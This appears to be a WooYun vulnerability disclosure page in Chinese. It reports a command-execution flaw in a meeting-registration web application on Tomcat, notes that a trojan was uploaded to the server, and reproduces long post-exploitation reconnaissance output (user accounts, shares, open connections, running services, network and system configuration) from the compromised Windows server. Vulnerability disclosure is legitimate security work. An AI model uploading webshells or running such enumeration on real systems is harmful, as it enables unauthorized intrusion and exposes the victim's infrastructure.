乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-08: 细节已通知厂商并且等待厂商处理中 2015-11-19: 厂商已经确认,细节仅向厂商公开 2015-11-29: 细节向核心白帽子及相关领域专家公开 2015-12-09: 细节向普通白帽子公开 2015-12-19: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
地址**.**.**.**:8080/meeting/stafftoRegist.action存在命令执行漏洞
直接上传木马到服务器
[*] 磁盘列表 [ C:D:E:F: ]D:\meeting-tomcat\webapps\meeting\meeting\> net user\\WIN-TKJ69DO47HC 的用户帐户-------------------------------------------------------------------------------Administrator Guest SQLDebugger 命令成功完成。系统找不到指定的路径。D:\meeting-tomcat\> net share共享名 资源 注解-------------------------------------------------------------------------------C$ C:\ 默认共享 D$ D:\ 默认共享 E$ E:\ 默认共享 IPC$ 远程 IPC ADMIN$ C:\Windows 远程管理 命令成功完成。D:\meeting-tomcat\> net view发生系统错误 6118。此工作组的服务器列表当前无法使用D:\meeting-tomcat\> netstat -ano活动连接 协议 本地地址 外部地址 状态 PID TCP **.**.**.**:80 **.**.**.**:0 LISTENING 7792 TCP **.**.**.**:135 **.**.**.**:0 LISTENING 848 TCP **.**.**.**:445 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:1433 **.**.**.**:0 LISTENING 26856 TCP **.**.**.**:1444 **.**.**.**:0 LISTENING 6992 TCP **.**.**.**:1720 **.**.**.**:0 LISTENING 1300 TCP **.**.**.**:2500 **.**.**.**:0 LISTENING 1300 TCP **.**.**.**:5800 **.**.**.**:0 LISTENING 1560 TCP **.**.**.**:5900 **.**.**.**:0 LISTENING 1560 TCP **.**.**.**:8000 **.**.**.**:0 LISTENING 7792 TCP **.**.**.**:8010 **.**.**.**:0 LISTENING 20560 TCP **.**.**.**:8080 **.**.**.**:0 LISTENING 20560 TCP **.**.**.**:8084 **.**.**.**:0 LISTENING 5648 TCP **.**.**.**:8085 **.**.**.**:0 LISTENING 5648 TCP **.**.**.**:49152 **.**.**.**:0 LISTENING 564 TCP **.**.**.**:49153 **.**.**.**:0 LISTENING 940 TCP **.**.**.**:49154 **.**.**.**:0 LISTENING 976 TCP **.**.**.**:49155 **.**.**.**:0 LISTENING 660 TCP **.**.**.**:49157 **.**.**.**:0 LISTENING 652 TCP **.**.**.**:60001 **.**.**.**:0 LISTENING 1300 TCP **.**.**.**:1444 **.**.**.**:50516 ESTABLISHED 6992 TCP **.**.**.**:1444 **.**.**.**:50517 ESTABLISHED 6992 TCP **.**.**.**:1444 **.**.**.**:50518 ESTABLISHED 6992 TCP **.**.**.**:1444 **.**.**.**:50519 ESTABLISHED 6992 TCP **.**.**.**:1444 **.**.**.**:50520 ESTABLISHED 6992 TCP **.**.**.**:8006 **.**.**.**:0 LISTENING 20560 TCP **.**.**.**:8009 **.**.**.**:0 LISTENING 7792 TCP **.**.**.**:20010 **.**.**.**:49220 ESTABLISHED 1300 TCP **.**.**.**:49220 **.**.**.**:20010 ESTABLISHED 1300 TCP **.**.**.**:50516 **.**.**.**:1444 ESTABLISHED 20560 TCP **.**.**.**:50517 **.**.**.**:1444 ESTABLISHED 20560 TCP **.**.**.**:50518 **.**.**.**:1444 ESTABLISHED 20560 TCP **.**.**.**:50519 **.**.**.**:1444 ESTABLISHED 20560 TCP **.**.**.**:50520 **.**.**.**:1444 ESTABLISHED 20560 TCP **.**.**.**:59632 **.**.**.**:59634 ESTABLISHED 7792 TCP **.**.**.**:59634 **.**.**.**:59632 ESTABLISHED 7792 TCP **.**.**.**:59635 **.**.**.**:59636 ESTABLISHED 7792 TCP **.**.**.**:59636 **.**.**.**:59635 ESTABLISHED 7792 TCP **.**.**.**:60529 **.**.**.**:60534 ESTABLISHED 5648 TCP **.**.**.**:60534 **.**.**.**:60529 ESTABLISHED 5648 TCP **.**.**.**:60537 **.**.**.**:60541 ESTABLISHED 5648 TCP **.**.**.**:60541 **.**.**.**:60537 ESTABLISHED 5648 TCP **.**.**.**:80 **.**.**.**:27543 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:53790 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:53792 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:53793 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:53797 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:53798 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:50273 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:50274 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:50275 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:50278 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:50148 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:7271 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:7276 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:1610 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:11910 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:11912 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:22309 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:46816 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:46817 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:46818 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:2168 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:2171 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:2175 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:2176 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:49908 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:49909 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:49917 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:49918 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:49919 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:49920 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:49921 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:49922 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:49937 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:49938 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:52472 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:52477 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:52497 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:52499 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:52504 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:52505 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:52506 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:52507 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:31783 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:31786 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:31789 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:31790 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:31791 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:31792 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:46558 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:30655 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:31991 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:31992 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:18098 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:18125 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:18649 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:18704 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:18792 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:18799 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:18804 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:18814 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:18952 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:19242 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:19305 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:19307 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:19309 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:2266 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:2268 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:2273 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:2274 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:2275 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:2276 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:2278 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:4387 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:57322 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:9216 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:9313 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:9345 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:9376 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:9440 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:9472 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:9504 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:17990 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:17992 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:33621 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:34819 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:34821 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:43228 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:53759 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:1365 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:2028 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:10278 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:10280 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:19558 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:19563 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:19564 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:49757 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:49908 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:4272 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:4353 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:4502 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:4503 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:4504 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:4505 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:4506 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:4507 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:4909 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:4911 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:4912 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:4913 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:4914 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:4915 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:4916 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:4917 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:4918 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:4919 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:4920 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:52130 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:4543 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:23415 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:25533 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:28322 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:30579 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:32590 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:38124 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:39648 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:43171 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:47887 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:54829 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:55380 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:4583 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:4585 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:9579 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:9581 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:9582 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:11496 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:47564 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:1803 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:1824 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:1958 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:1971 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:49553 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:49558 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:49559 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:49560 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:49561 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:49562 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:36882 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:36918 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:36919 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:36926 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:49641 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:35718 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:35719 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:52398 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:51099 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:2314 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:59522 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:59525 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:59527 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:62865 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:62866 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:62867 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:64958 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:64959 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:64960 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:64961 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:64962 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:64963 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:64964 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:64965 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:64966 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:64967 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:5467 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:18396 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:18398 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:18400 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:18401 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:28009 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:13973 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:62070 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:20981 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:7557 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:9669 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:37711 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:40549 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:41412 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:41899 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:43571 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:44085 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:45790 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:48714 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:49461 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:52194 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:11402 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:3269 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:56358 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:56362 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:56364 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:56366 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:56368 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:50276 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:50277 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:56147 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:41066 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:41081 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:41139 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:41142 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:41143 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:41197 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:61181 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:28471 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:28489 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:28490 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:28492 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:8061 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:20180 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:29769 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:43586 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:46023 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:46681 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:53356 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:58862 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:51197 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:49940 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:9360 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:7884 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:9208 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:10061 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:11264 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:13341 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:14343 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:15493 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:25540 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:26661 ESTABLISHED 7792 TCP **.**.**.**:80 **.**.**.**:27458 ESTABLISHED 7792 TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:5800 **.**.**.**:21188 ESTABLISHED 1560 TCP **.**.**.**:5800 **.**.**.**:21188 ESTABLISHED 1560 TCP **.**.**.**:8080 **.**.**.**:35810 ESTABLISHED 20560 TCP **.**.**.**:64600 **.**.**.**:80 ESTABLISHED 1752 TCP **.**.**.**:64601 **.**.**.**:80 ESTABLISHED 1752 TCP [::]:135 [::]:0 LISTENING 848 TCP [::]:445 [::]:0 LISTENING 4 TCP [::]:1444 [::]:0 LISTENING 6992 TCP [::]:5800 [::]:0 LISTENING 1560 TCP [::]:5900 [::]:0 LISTENING 1560 TCP [::]:8010 [::]:0 LISTENING 20560 TCP [::]:8080 [::]:0 LISTENING 20560 TCP [::]:49152 [::]:0 LISTENING 564 TCP [::]:49153 [::]:0 LISTENING 940 TCP [::]:49154 [::]:0 LISTENING 976 TCP [::]:49155 [::]:0 LISTENING 660 TCP [::]:49157 [::]:0 LISTENING 652 UDP **.**.**.**:500 *:* 976 UDP **.**.**.**:1718 *:* 1300 UDP **.**.**.**:1719 *:* 1300 UDP **.**.**.**:4500 *:* 976 UDP **.**.**.**:5355 *:* 552 UDP **.**.**.**:63161 *:* 1752 UDP **.**.**.**:137 *:* 4 UDP **.**.**.**:138 *:* 4 UDP [::]:500 *:* 976 UDP [::]:4500 *:* 976 UDP [::]:5355 *:* 552 UDP [fe80::51e2:63ee:5c45:3df6%11]:546 *:* 940D:\meeting-tomcat\> tasklist /svc映像名称 PID 服务 ========================= ======== ============================================System Idle Process 0 暂缺 System 4 暂缺 smss.exe 420 暂缺 csrss.exe 512 暂缺 csrss.exe 556 暂缺 wininit.exe 564 暂缺 winlogon.exe 604 暂缺 services.exe 652 暂缺 lsass.exe 660 SamSs lsm.exe 668 暂缺 svchost.exe 764 DcomLaunch, PlugPlay, Power svchost.exe 848 RpcEptMapper, RpcSs svchost.exe 940 Dhcp, eventlog, lmhosts svchost.exe 976 AeLookupSvc, Appinfo, AppMgmt, gpsvc, IKEEXT, iphlpsvc, LanmanServer, ProfSvc, Schedule, SENS, ShellHWDetection, Winmgmt, wuauserv svchost.exe 256 EventSystem, netprofm, nsi svchost.exe 272 Netman, UxSms ZhuDongFangYu.exe 296 ZhuDongFangYu svchost.exe 552 CryptSvc, Dnscache, LanmanWorkstation, NlaSvc svchost.exe 1032 BFE, DPS, MpsSvc spoolsv.exe 1188 Spooler mssearch.exe 1244 MSSEARCH winvnc4.exe 1464 WinVNC4 winvnc4.exe 1560 暂缺 svchost.exe 2464 PolicyAgent taskhost.exe 1880 暂缺 dwm.exe 832 暂缺 explorer.exe 2632 暂缺 MtxHotPlugService.exe 2428 暂缺 mcuGK40_d.exe 1300 暂缺 conhost.exe 2556 暂缺 360tray.exe 1752 暂缺 SoftMgrLite.exe 3968 暂缺 msdtc.exe 4288 MSDTC dllhost.exe 5740 COMSysApp sqlmangr.exe 3356 暂缺 mmc.exe 2588 暂缺 TrustedInstaller.exe 5068 TrustedInstaller sppsvc.exe 5192 sppsvc sqlservr.exe 6992 MSSQL$SQLEXPRESS cmd.exe 2868 暂缺 conhost.exe 5448 暂缺 java.exe 5648 暂缺 cmd.exe 10368 暂缺 conhost.exe 12200 暂缺 java.exe 7792 暂缺 ssmsee.exe 28572 暂缺 WmiPrvSE.exe 20904 暂缺 java.exe 20560 暂缺 conhost.exe 29420 暂缺 WZUNZIP.EXE 25188 暂缺 conhost.exe 27404 暂缺 WZUNZIP.EXE 23104 暂缺 conhost.exe 13444 暂缺 sqlservr.exe 26856 MSSQLSERVER WZUNZIP.EXE 23916 暂缺 WZUNZIP.EXE 24960 暂缺 WZUNZIP.EXE 12016 暂缺 conhost.exe 28764 暂缺 conhost.exe 28940 暂缺 conhost.exe 29104 暂缺 WZUNZIP.EXE 27764 暂缺 conhost.exe 29252 暂缺 WZUNZIP.EXE 2488 暂缺 conhost.exe 24924 暂缺 WZUNZIP.EXE 29760 暂缺 WZUNZIP.EXE 29796 暂缺 conhost.exe 29772 暂缺 conhost.exe 30040 暂缺 cmd.exe 24380 暂缺 conhost.exe 18924 暂缺 tasklist.exe 12456 暂缺 D:\meeting-tomcat\> net start已经启动以下 Windows 服务: Application Experience Application Information Application Management Base Filtering Engine COM+ Event System COM+ System Application Cryptographic Services DCOM Server Process Launcher Desktop Window Manager Session Manager DHCP Client Diagnostic Policy Service Distributed Transaction Coordinator DNS Client Group Policy Client IKE and AuthIP IPsec Keying Modules IP Helper IPsec Policy Agent Microsoft Search MSSQLSERVER Network Connections Network List Service Network Location Awareness Network Store Interface Service Plug and Play Power Print Spooler Remote Procedure Call (RPC) RPC Endpoint Mapper Security Accounts Manager Server Shell Hardware Detection Software Protection SQL Server (SQLEXPRESS) System Event Notification Service Task Scheduler TCP/IP NetBIOS Helper User Profile Service VNC Server Version 4 Windows Event Log Windows Firewall Windows Management Instrumentation Windows Modules Installer Windows Update Workstation 主动防御命令成功完成。D:\meeting-tomcat\> ipconfig /allWindows IP 配置 主机名 . . . . . . . . . . . . . : WIN-TKJ69DO47HC 主 DNS 后缀 . . . . . . . . . . . : 节点类型 . . . . . . . . . . . . : 混合 IP 路由已启用 . . . . . . . . . . : 否 WINS 代理已启用 . . . . . . . . . : 否以太网适配器 本地连接 2: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection #2 物理地址. . . . . . . . . . . . . : 00-25-90-96-DA-7F DHCP 已启用 . . . . . . . . . . . : 是 自动配置已启用. . . . . . . . . . : 是以太网适配器 本地连接: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection 物理地址. . . . . . . . . . . . . : 00-25-90-96-DA-7E DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是 本地链接 IPv6 地址. . . . . . . . : fe80::51e2:63ee:5c45:3df6%11(首选) IPv4 地址 . . . . . . . . . . . . : **.**.**.**(首选) 子网掩码 . . . . . . . . . . . . : **.**.**.** 默认网关. . . . . . . . . . . . . : **.**.**.** DHCPv6 IAID . . . . . . . . . . . : 234890640 DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-1C-F4-34-2F-00-25-90-96-DA-7E DNS 服务器 . . . . . . . . . . . : **.**.**.** **.**.**.** TCPIP 上的 NetBIOS . . . . . . . : 已启用隧道适配器 isatap.{A6239451-E04A-4607-84CD-96FCE973120E}: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是隧道适配器 isatap.{A31F0B63-41FB-4DF0-8027-1AA6CA62D30D}: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #2 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是隧道适配器 6TO4 Adapter: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Microsoft 6to4 Adapter 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是 IPv6 地址 . . . . . . . . . . . . : 2002:b4a8:d316::b4a8:d316(首选) 默认网关. . . . . . . . . . . . . : 2002:c058:6301::c058:6301 DNS 服务器 . . . . . . . . . . . : **.**.**.** **.**.**.** TCPIP 上的 NetBIOS . . . . . . . : 已禁用隧道适配器 Teredo Tunneling Pseudo-Interface: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是 IPv6 地址 . . . . . . . . . . . . : 2001:0:b4a8:29af:34c7:20e3:4b57:2ce9(首选) 本地链接 IPv6 地址. . . . . . . . : fe80::34c7:20e3:4b57:2ce9%16(首选) 默认网关. . . . . . . . . . . . . : TCPIP 上的 NetBIOS . . . . . . . : 已禁用D:\meeting-tomcat\> systeminfo主机名: WIN-TKJ69DO47HCOS 名称: Microsoft Windows Server 2008 R2 Standard OS 版本: 6.1.7601 Service Pack 1 Build 7601OS 制造商: Microsoft CorporationOS 配置: 独立服务器OS 构件类型: Multiprocessor Free注册的所有人: Windows 用户注册的组织: 产品 ID: 00477-OEM-8400101-10502初始安装日期: 2015/5/25, 9:37:45系统启动时间: 2015/5/28, 0:22:00系统制造商: 